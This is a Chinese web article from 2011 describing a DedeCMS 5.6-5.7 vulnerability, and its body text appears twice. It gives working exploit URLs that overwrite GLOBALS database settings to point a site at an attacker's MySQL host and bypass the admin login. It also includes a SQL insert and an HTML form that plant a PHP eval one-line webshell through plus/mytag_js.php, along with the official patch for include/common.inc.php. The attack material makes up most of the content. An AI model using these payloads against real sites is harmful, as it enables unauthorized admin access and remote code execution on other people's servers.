DEDECMS 爆嚴重安全漏洞 免賬號密碼直接進入后臺
發(fā)布時間:2011-08-20 23:46:44 作者:佚名
我要評論

眾所周知,因使用簡單、客戶群多,織夢CMS一直被爆出許多漏洞。今天小編在群里得到織夢官方論壇某版主可靠消息:DEDECMS爆嚴重安全漏洞,近期官方會發(fā)布相關補丁,望大家及時關注補丁動態(tài)。
入侵步驟如下:http://www.xx.com/織夢網站后臺/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面validate后面的字母改為當前的驗證碼,即可直接進入網站后臺。
小編分析了一下,此漏洞的前提是必須得到后臺路徑才能實現(xiàn),因此大家一定要養(yǎng)成使用DEDECM建站時改后臺名字的習慣。下面給出官方的解決辦法:
解決辦法:
找到include/common.inc.php文件,把
foreach($_REQUEST as $_k=>$_v)
{
var_dump($_k);
if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ):
{
exit('Request var not allow!');
}
}
換成
//檢查和注冊外部提交的變量
function CheckRequest(&$val) {
if (is_array($val)) {
foreach ($val as $_k=>$_v) {
CheckRequest($_k);
CheckRequest($val[$_k]);
}
} else
{
if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
{
exit('Request var not allow!');
}
}
}
CheckRequest($_REQUEST);
網傳的都是說要知道后臺才能利用,但不用,只要 plus 目錄存在,服務器能外連,就能拿shell
前題條件,必須準備好自己的dede數(shù)據庫,然后插入數(shù)據:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
====================================================
DedeCms v5.6-5.7 0day
其實除過windows系統(tǒng),很多服務提供商是不讓php連接外部mysql服務器的。
用PHPNow在本地搭建DEDECMS運行環(huán)境并安裝DEDECMS,這里以DedeCMSV57_UTF8為例。
直接進后臺:
dede/login.php?dopost=login&validate=8235&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_
直接獲得webshell:
進入自己在本地搭建的dede數(shù)據庫,然后插入數(shù)據:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');
在地址欄提交以下語句即可獲得一句話木馬plus/1.php:
plus/mytag_js.php?aid=1&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_&nocache=true
把上面validate后面的字母改為當前的驗證碼,即可直接進入網站后臺。
小編分析了一下,此漏洞的前提是必須得到后臺路徑才能實現(xiàn),因此大家一定要養(yǎng)成使用DEDECM建站時改后臺名字的習慣。下面給出官方的解決辦法:
解決辦法:
找到include/common.inc.php文件,把
foreach($_REQUEST as $_k=>$_v)
{
var_dump($_k);
if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ):
{
exit('Request var not allow!');
}
}
換成
//檢查和注冊外部提交的變量
function CheckRequest(&$val) {
if (is_array($val)) {
foreach ($val as $_k=>$_v) {
CheckRequest($_k);
CheckRequest($val[$_k]);
}
} else
{
if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
{
exit('Request var not allow!');
}
}
}
CheckRequest($_REQUEST);
網傳的都是說要知道后臺才能利用,但不用,只要 plus 目錄存在,服務器能外連,就能拿shell
前題條件,必須準備好自己的dede數(shù)據庫,然后插入數(shù)據:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
====================================================
DedeCms v5.6-5.7 0day
其實除過windows系統(tǒng),很多服務提供商是不讓php連接外部mysql服務器的。
用PHPNow在本地搭建DEDECMS運行環(huán)境并安裝DEDECMS,這里以DedeCMSV57_UTF8為例。
直接進后臺:
dede/login.php?dopost=login&validate=8235&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_
直接獲得webshell:
進入自己在本地搭建的dede數(shù)據庫,然后插入數(shù)據:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');
在地址欄提交以下語句即可獲得一句話木馬plus/1.php:
plus/mytag_js.php?aid=1&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_&nocache=true
相關文章
- 最近看到網上曝出的dedecms最新版本的一個注入漏洞利用,漏洞PoC和分析文章也已在網上公開.但是在我實際測試過程當中,發(fā)現(xiàn)無法復現(xiàn)2013-06-11
- 春節(jié)呆在家里上網,我表哥突然找我說要一個DJ網站的VIP會員,說搞定后請我吃KFC,于是就答應了。2011-03-22
- 腳本入侵-ASP網站入侵一些技巧 先說明下 先看下是不是html轉的asp生成的站2011-04-24
Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法
這篇文章主要為大家介紹了Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法,對于網絡安全而言非常重要!需要的朋友可以參考下2014-07-05訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明
訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明,使用訊時網站管理系統(tǒng)的朋友可以參考下。2011-07-15- 手工注入方法,方便大家測試程序漏洞,本人只供學習交流,不建議搞破壞。2011-11-03
phpcms2008 代碼執(zhí)行 批量getshell EXP(使用菜刀)
這篇文章主要介紹了phpcms2008 代碼執(zhí)行 批量getshell EXP的相關資料,需要的朋友可以參考下2014-05-09- 腳本入侵-上傳漏洞總結篇(臭小子),從事于網站開發(fā)的程序員要看下,不要讓自己的程序別黑客利用。2011-04-24
- php后臺插一句話的思路加114網址導航后臺拿webshell的方法。2011-09-29
- DDos攻擊是現(xiàn)在大部分用戶最喜歡的一個話題,近兩年來發(fā)展態(tài)勢也漸趨平緩,歐洲反垃圾郵件組織Spamhaus突然遭受到高達300Gbps的大流量DDos攻擊被認為是史上最大DDoS攻擊,2016-09-20